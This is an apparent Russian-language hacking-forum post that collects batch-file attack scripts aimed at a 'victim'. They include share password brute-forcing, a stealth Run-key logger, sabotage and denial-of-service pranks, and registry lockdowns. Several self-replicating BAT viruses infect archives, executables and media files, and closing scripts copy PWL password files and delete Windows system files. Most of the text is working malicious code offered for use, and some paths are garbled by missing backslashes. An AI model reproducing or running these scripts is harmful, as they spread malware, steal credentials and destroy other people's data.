В етой ТЕМЕ я описал несколько информацыи о bat'файлах
Может камуто она пригодиста, может ктото поменяет свайо мнения.
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
1) Итак начнем с того как пропинговать целую подсетку
@ECHO OFF
FOR %%a IN ( 1 2 3 4 5 6 7 8 9 10 134 35 52 234 ) DO ping -a 192.168.1.%%a scan.log
В данном примере есть фиксированная подсетка 192.168.1. и в ней уже сканятся IP
192.168.1.1 .... 192. 168.1.234
Притом результаты сканирования будут сохранятся в scan.log
2) А теперь рассмотрим пример если вам надо просканировать ряд IP из разных подсетей @ECHO OFF
FOR %%a IN ( 192.168.5.13
www.ru 212.6.38.240 10.0.0.1 ) DO ping -a %%a
3) Что у этих людей на samb'e висит ( тобишь что за диски расшаренны )
@ECHO OFF
FOR %%a IN ( 192.168.5.13
www.ru 212.6.38.240 10.0.0.1 ) DO net view %%a samba.log
Все что удалось раздобыть можно увидеть в samba.log
4) Вот если надо подобрать пароль на расшаренный диск винды , а ручками не охота Смотрим что у жертвы расшаренно net view 192.168.1.1
CWINDOWSnet view 192.168.1.1
Общие ресурсы компьютера 192.168.1.1
Сетевое имя Тип Заметки
-------------------------------------
C Диск My disk C
GAMES Диск
Команда выполнена успешно.
@ECHO OFF
FOR %%a IN ( PassworD dexim 6gamer6 mustdie666 ) DO net use x 192.168.1.1C %%a
В этом случае будут перебираться все пароли которые указанны в скобках .
5) Ведение лога - когда загружали комп
@ECHO OFF
echo. date find Текboot.log
echo. time find Текboot.log
Через find ищем слово Текущая - тем самым выбираем только те строки в которых оно есть. Эти строки добавляем в autoexec.bat . А еще лучше чтобы не нашли слежку - сделаем такой скрипт
---------------Begin listing of spy.bat---------
@ECHO OFF
echo. data find Тек%windir%boot.log
echo. time find Тек%windir%boot.log
--------------End listing of spy.bat--------------
Нижеследующий скрипт запускается прямо с дискетки .
@ECHO OFF
COPY aspy.bat %windir%
DEL aspy.bat
ECHO REGEDIT 4%windir%ch.reg
ECHO [HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentV ersionRun]%windir%ch.reg
ECHO Logger=%windir%spy.bat%windir%ch.reg
%windir%regedit.exe Lsystem.dat Ruser.dat ch.reg
Как видите скрипт прописывает в реестр в ключик Run чтобы грузился spy.bat - и теперь при каждой загрузки не компа , а винды будет добавляться запись в boot.log . Ниже приведенные скрипты тоже можно прописывать в ключики Run,RunOnce,RunServises и RunServisesOnce.
6) Теперь можно перейти и к западлостроению . Делаем юзеру скорость на модеме ( или нульмодеме) невыносимой
@ECHO OFF
mode com2 baud=110
Таким образом скорость на com2 ограничиваеться 110 бодами .
А если у жерты нет модема , не отчаивайтесь значит должен быть принтер тогда делаем так
@ECHO OFF
mode lpt1=com1
Таким образом все что идет на принтер будет на мышь или что там у него стоит на com1 .
7) А можно сделать чтобы он вообще не загрузился в MD ECHO REGEDIT 4%windir%ch.reg
ECHO [HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentV ersionRun]%windir%ch.reg
ECHO Rebutim=%windir%rundll32.exe KRNL386.exe,ExitKernel%windir%ch.reg
%windir%regedit.exe Lsystem.dat Ruser.dat ch.reg
Можно вместо %windir%rundll32.exe KRNL386.exe,ExitKernel ( reboot ) , поставить RUNDLL32
Keyboard,Disable пусть попробует поработать без клавы -)
8) DoS на MD через IЕ
@ECHO OFF
loop
%windir%vcmiexplore.exe
http://www.forum.antichat.ru
goto loop
Гарантированно , что юзеру будет не весело видеть такое . Ну путь естественно поменяйте на тот - где у вас лежит IE. Самое интерестное , что IE запускается до тех пор пока не будет исчерпан лимит max количества приложений . После того как юзер закроет хоть одно окно - то сразуже запустится еще один IE . При тестировании моя машина даже неуспевала реагировать на нажатие Ctrl+Alt+Del .
9) А этот прикол шокирует почти всех LMD @ECHO OFF
ECHO REGEDIT 4%windir%ch.reg
ECHO [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVe rsionPoliciesExplorer]%windir%ch.reg
ECHO NoRun=dword00000001%windir%ch.reg
ECHO NoSetFolders=dword00000001%windir%ch.reg
ECHO NoFind=dword00000001%windir%ch.reg
ECHO NoNetHood=dword00000001%windir%ch.reg
ECHO NoDesktop=dword00000001%windir%ch.reg
ECHO NoClose=dword00000001%windir%ch.reg
%windir%regedit.exe Lsystem.dat Ruser.dat ch.reg
Вот описание этих фич
NoRun - нет пункта меню Выполнить
NoSetFolders - нет Панель управления
NoFind - нет Найти
NoNetHood - нет Сетевое окружение
NoDesktop - нет рабочего стола
NoClose - нельзя закрыть винду )
Вот можно еще применить - я думаю сами разберетесь
[HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentV ersionPoliciesExplorer]
NoDriveTypeAutoRun=hex95,00,00,00
NoPrinterTabs=dword00000001
NoDeletePrinter=dword00000001
NoAddPrinter=dword00000001
NoSetFolders=dword00000001
NoSetTaskbar=dword00000001
NoSaveSettings=dword00000001
[HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentV ersionPoliciesNetwork]
NoNetSetup=dword00000001
NoNetSetupIDPage=dword00000001
NoNetSetupSecurityPage=dword00000001
NoFileSharingControl=dword00000001
NoPrintSharingControl=dword00000001
NoEntireNetwork=dword00000001
[HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentV ersionPoliciesSystem]
NoDispCPL=dword00000001
NoDispBackgroundPage=dword00000001
NoDispScrSavPage=dword00000001
NoDispAppearancePage=dword00000001
NoDispSettingsPage=dword00000001
NoSecCPL=dword00000001
NoPwdPage=dword00000001
NoAdminPage=dword00000001
NoProfilePage=dword00000001
NoDevMgrPage=dword00000001
NoConfigPage=dword00000001
NoFileSysPage=dword00000001
NoVirtMemPage=dword00000001
10) В BAT можно и COM запихнуть
Для начала наваяем какуюнибудь прогу на ASM'е
model tiny
.code
Begin
mov al,0ah ;адрес статуса диска
out 70h,al ;засылаем аддрес
nop ;задержка - нужна обязательно
mov al,1 ;активизируем флоп
out 71h,al ;засылаем
nop ;ЧАСТЬ ВТОРАЯ
mov al,10h ;адрес типа диска
out 70h,al ;засылаем адресок
nop ;задержка
mov al,07h ;тип дисковода 1.44Mb
out 71h,al ;засылаем
End Begin
Прога включает дисковод в обход BIOS'а ( выбрана от фени для примера ). После ее скомпиляем tasm'ом
tasm prog.asm
tlink prog.obj t
И после этого в каком нибудь HEX редакторе посмотрим HEX код этой проги и запихнем его в prog.txt
nPROG.COM
a100
db B0,0A,E6,70,90,B0,01,E6,71,90,B0,10
db E6,71
w
Q
Дальше ваяем BAT @ECHO OFF
DEBUG.EXE PROG.TXT
PROG.COM
Все команды , что были в PROG.TXT передадутся в DEBUG.EXE - он создаст PROG.COM потом мы его запускаем .
---------------------------------------------ВИРУС--------------------------------------------------------------------
Теперь чуть о приметивных вирусах ( ну в реале они уже нетакие приметивные).....
1#------------------>>>>>>>>>>>>>
Начнем мы с вируса, который заражает *.zip (архивы).
Вот глядите:
@For %%g in (*.zip) do pkzip %%g %0 >nul
Что это за лажа? (у вас не возникло этого вопроса?) Это не "лажа", это полноценный вирус в виде BAT-файла.
Состоит он из одной строчки. Хотя он вряд ли сможет вызвать мировую эпидемию, но авторы антивирусов с
удовольствием пополнят им свои базы ==> свои карманы.
А вот модификация, которая заражает уже RAR-архивы:
@For %%g in (*.rar) do rar a %%g %0 >nul
Конечно, можно заражать таким способом любые архивы. Если у вас возник вопрос на тему как вписать в такой вирус его имя
(если вы такой чайник):
@For %%g in (*.rar) do rar a %%g %0 >nul
@echo Привет! Этот вирус называется antichatVIRUS
Если вам этого мало, то поговорим о замещающих вирусах.
Замещающие вирусы - это вирусы которые пишут свой код поверх кода жертвы, этим приводя их в негодность.
Я бы не называл такие программы вирусами, но не буду спорить с великими докторами (хотя, какие это доктора,
они наверное искусственное дыхание будут делать не в то отверстие... назовем их антивирусописателями),
которые ради денег любой байт могут назвать очень опасным вирусом или троянцем.
@For %%g in (*.bat) do copy %0 %%g >nul
echo You have a virus!
Это был пример замещающего вируса, который заражает *.bat.
А воспользовавшись программой BAT2COM или BAT2EXEC можно сделать нечто более массовое. Вот пример вируса заражающего *.exe и *.com:
@For %%g in (*.exe *.com) do copy %0 %%g >nul
echo You have a virus!
Этот BAT-файл нужно перегнать в EXE или COM-файл при помощи программ перечисленных выше.
#2-------------->>>>>>>>>>
Начнем с BAT-вируса
@Echo off
copy %0 c:\virus.bat >nul
echo c:\virus.bat>>c:\autoexec.bat
Echo It_is_MeTrA
Этот вирус заражает винчестер, оставляя только один файл virus.bat. Но все-таки я бы не сказал что это полноценный вирус, т.к. он лишен возможности заражать другие компьютеры. Хотя существует древний подобный вирус DrWatson, этот вирус копирует свое тело в файл c:\drwatson.exe и вставляет строчку вызова в autoexec.bat. Если авторы антивирусов посчитали, что эта программа является вирусом, то чем же вышепоказанная программа не вирус.
Чтобы этот BAT-вирус обрел более четкие очертания дополним его возможностью заражать другие ПК (персональные компьютеры). Смотрим:
@Echo off
copy %0 c:\virus.bat >nul
echo c:\virus.bat>>c:\autoexec.bat
copy %0 a:\run.bat >nul
Echo It_is_MeTrA
В этом примере появляется строка, которая дает возможность вирусу заражать дискеты. Смысл этого в том что если при перезагрузке ПК в дисководе будет дискета, то она будет заражена.
Конечно файл virus.bat в корневом диске C: будет сильно мозолить глаза юзеру (пользователю), чтобы этого не было существует программа attrib. Преобразуем вирус:
@Echo off
copy %0 c:\virus.bat >nul
attrib +h c:\virus.bat >nul
echo c:\virus.bat>>c:\autoexec.bat
copy %0 a:\run.bat >nul
Echo It_is_MeTrA
Если вы внимательны, то вы уже поняли, что вызов файла virus.bat в autoexec.bat будет записываться каждый раз при перезагрузке ПК. Чтобы этого не произошло есть простой способ: после записи вызова надо с помощью программы attrib установить атрибут только чтение у autoexec.bat. А есть другой вариант, он немного посложнее, но гораздо грамотнее, смотрите:
@Echo off
if exist c:\virus.bat goto cool
copy %0 c:\virus.bat >nul
attrib +h c:\virus.bat >nul
echo c:\virus.bat>>c:\autoexec.bat
:cool
copy %0 a:\run.bat >nul
Echo It_is_MeTrA
Здесь вторая строка проверяет существует ли уже файл c:\virus.bat и если он уже существует, то происходит переход к метке cool. Этот способ тоже очень прост. Явный недостаток - если юзер уберет вызов из autoexec.bat, а файл virus.bat оставит, то глупый вирус будет нагло обманут. Чтобы вирус был умнее, то надо использовать программу find, если вам будет не лень с ней разбираться, то вы сможете написать более сложный BAT-вирус, который будет заражать не один файл c:\autoexec.bat, а все *.BAT. Пример:
@echo off%[MeTrA]%
if '%1=='In_ goto MeTrAin
if exist c:\MeTrA.bat goto MeTrAru
if not exist %0 goto MeTrAen
find "MeTrA"<%0>c:\MeTrA.bat
attrib +h c:\MeTrA.bat
:MeTrAru
for %%t in (*.bat) do call c:\MeTrA In_ %%t
goto MeTrAen
:MeTrAin
find "MeTrA"<%2>nul
if not errorlevel 1 goto MeTrAen
type c:\MeTrA.bat>>%2
:MeTrAen
Смысл заражения таков: в вирусе каждая строчка имеет метку, в данном примере она "MeTrA", например, в первой строке эта метка ничего не делает, во второй строке эта метка, как бы, не является пассивной, она используется для внутренней работы вируса, а именно участвует в названии метки. При запуске вирус проверяет, есть ли файл C:\METRA.BAT, если нет, то вирус создает его и с помощью программы find копирует из файла (из которого стартовал) все строки содержащие метку вируса, т.е. копирует только вирусные строки. Так, вирусные строки скопированы. Значит в файле C:\METRA.BAT теперь находится копия вируса. Далее вирус ищет BAT-файлы. Чтобы не происходило повторного заражения используется все таже программа find. Допустим вирус нашел файл RUN.BAT и он оказался еще не заражен, тогда вирус вызывает файл C:\METRA.BAT с такими параметрами: "In_ RUN.BAT", здесь первый параметр "In_" говорит вирусу, что надо заразить файл, имя которого указано во-втором параметре, в данном случае он "RUN.BAT". Вирус в C:\METRA.BAT заражает файл RUN.BAT простейшим способом - с помощью команды type дописывает к файлу RUN.BAT себя. Вот так файл RUN.BAT оказывается зараженным.
#3-------------->>>>>>>>
Вам известно, что JPG-файлы - это картинки. И вы наверно слышали,
что заражать их нельзя. Но на самом деле заражать можно почти все.
Вот смотрите. Вирус заражает *.JPG в текущем каталоге.
------------------------ резать тут -----------------------------
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (*.jpg) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
------------------------ резать тут -----------------------------
Как видите, этот вирус является BAT-файлом. Принцип работы
такой же как и у BAT-вирусов. Если вы не поняли как все это работает, то объясняю.
Каждая вирусная строка имеет метку "MrWeb", в каких-то строках эта метка не является
пассивной, т.е. учавствует в работе вируса, например во-второй строке вируса
"if '%1=='In_ goto MrWebin" эта метка содержится в метке "MrWebin", а вот в первой
строке эта метка является пассивной и поэтому она заключена в знаки процента.
Дак вот, при старте вируса происходит копирование вирусных строк (с меткой) в
специальный файл "c:\MrWeb.bat", конечно это происходит если данный файл не был раньше
создан вирусом. Дальше вирус ищет *.JPG, если находит то заражает их, для этого вирус
вызывает файл c:\MrWeb.bat и передает ему имя файла, который следует заразить.
Принцип заражения: например найден файл 001.JPG, вирус создает вирусный файл 001.JPG.bat,
т.е. принцип компаньон-вируса. Юзер захочет посмотреть картинку, щелкнет по нему мышкой
и увидит то, что хотел увидеть, т.е. картинку, а тем временем заразятся все другие картинки.
Круто?
И это еще не все, кто-то может еще сомневается, что можно заразить любой файл...
Так, какие типы файлов будем заражать? Файлы *.mp3 ? Музыку значит. Нет проблем.
Смотрите:
------------------------ резать тут -----------------------------
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat:MrWebru
for %%g in (*.mp3) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
------------------------ резать тут -----------------------------
Только знайте, если вы запускали первый пример вируса,
а теперь хотите с этим поприкалываться, то удалите сначала специальный файл
"c:\MrWeb.bat", а то будете потом говорить, что mp3 ни3я заразить...
Чтобы еще-то заразить... Давайте что-нибудь из классики, например *.EXE. Так...
------------------------ резать тут -----------------------------
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (*.exe) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo %2>>%2.bat%[MrWeb]%
:MrWeben
------------------------ резать тут -----------------------------
Учтите, что этот пример от предыдущего отличается не только
банальным "*.exe", но и убиранием вызова виндовской программы start.
Что? *.txt заразить? Можно, хотя и не совсем нужно. Но я же говорил,
что заражать можно все, значит получайте:
------------------------ резать тут -----------------------------
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (*.txt) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
------------------------ резать тут -----------------------------
Но это были всё пистики, а теперь тыковки. Внимание. Представляю
вам мега-вирус, он заражает *.jpg *.mp3 *.doc *.htm? *.xls. Причем заражает
не только в текущем каталоге, но и надкаталоге, поэтому не удивляйтесь,
если при его испытании, он расползется по всему винту. Вот он:
------------------------ резать тут -----------------------------
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (..\*.jpg ..\*.doc ..\*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:\MrWeb In_ %%ggoto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
------------------------ резать тут -----------------------------
Напоминаю, если вы испытывали предыдущие примеры, то перед
испытанием этого удалите файл c:\MrWeb.bat. Если у вас проскакивает
мысля о том, чтобы заражать "*.*", т.е. все типы файлов, то скажу,
что это возможно, только нужно сделать, чтобы вирус пропускал *.bat,
если это не сделать, то получится не вирус, а прикольный троян,
можете проверить
.Esli zahotite napisat' pis'mo, to nado pisat' tol'ko tak.
Или использовать это:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia
mQCNAzzfLAcAAAEEALzhTCg8+QcP3U/1fdQI9Ch/HBF49R5IzGko/1ibZzis1NCI
gU/CLil7D4xHEUnHehqzIkMVPApFllqt15OpTtaXzqjFBu0vZjwaK 2mvzj0rYiOU
4wvdgV4YoDmig3M+vSDV8CdtmAj9pCocU9sx+IdqB4zxDNREqZ xlSWrQE/AZAAUR
tAVNcldlYokAlQMFEDzfLAicZUlq0BPwGQEB/ogD/AgLofDrCowWxwEFW1fcBnRl
95uH5J/C0ywICTwRYeso1M9nx0W2zFK/ilQMN5IOIZ5ibzTwxkXNfGz4tAsnB0gY
/p/kptWIZ4PPKp52cqjCG/tBvL5ngUNJfOaUcyFstggVLoRWWGOV+i9AOTLeIlx4
x8rXPlCM/3qB/nvBJ0z+
=MTjO
-----END PGP PUBLIC KEY BLOCK-----
#4----------------------->>>>
@ECHO OFF
Copy %windir%\*.pwl a:\ - Копируем PWL юзера,
Дополнительно можно вежливо стащить SISTEM.INI
@ECHO OFF
Copy %windir%\Sistem.ini a:\
Вот и всё. Замечу, что у этого способа есть ещё много применений. Кстати можно завершая свой поход оставить от его винды одно воспоминание.
@ECHO OFF
cd C:
cd\
cd windows
del *.exe
del *.ini
del *.com
cd\
cd windows
cd system
del *.dll
del *.exe
cd\
Примитивно, но надёжно.
Содержание:
@ECHO OFF - Прячем текст от глаз посторонних.
VIRUS.EXE - Запускаем наш вирус.
Copy %windir%\*.pwl a:\ - Копируем PWL юзера
Copy %windir%\Sistem.ini a:\
cd C:
cd\
cd windows (Можно %WinDir% - так надёжнее.)
del *.exe
del *.ini
del *.com
cd\
cd windows
cd system
del *.dll
del *.exe
cd\
Ну, вот пожалуй и всё.
Ети стати не все я написал некоторые нарыл в нете...
Bat
Похожие темы
Древовидный вид